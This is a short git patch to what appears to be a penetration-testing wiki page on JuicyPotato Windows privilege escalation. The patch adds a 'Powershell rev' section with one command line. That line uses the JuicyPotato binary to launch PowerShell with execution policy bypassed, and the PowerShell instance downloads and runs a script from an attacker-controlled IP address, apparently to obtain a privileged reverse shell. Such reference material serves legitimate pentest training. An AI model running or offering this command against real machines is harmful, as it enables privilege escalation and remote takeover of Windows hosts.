From 9f94691dbe8fd6b1c395c3da4afface479d8cf97 Mon Sep 17 00:00:00 2001 From: CPol Date: Sun, 24 Jan 2021 16:24:08 +0000 Subject: [PATCH] GitBook: [master] 430 pages modified --- windows/windows-local-privilege-escalation/juicypotato.md | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/windows/windows-local-privilege-escalation/juicypotato.md b/windows/windows-local-privilege-escalation/juicypotato.md index 131cb4b2..ac4a68c2 100644 --- a/windows/windows-local-privilege-escalation/juicypotato.md +++ b/windows/windows-local-privilege-escalation/juicypotato.md @@ -85,6 +85,12 @@ Testing {4991d34b-80a1-4291-83b6-3328366b9097} 1337 c:\Users\Public> ``` +### Powershell rev + +```text +.\jp.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c powershell -ep bypass iex (New-Object Net.WebClient).DownloadString('http://10.10.14.3:8080/ipst.ps1')" -t * +``` + ### Launch a new CMD \(if you have RDP access\) ![](../../.gitbook/assets/image%20%2860%29.png)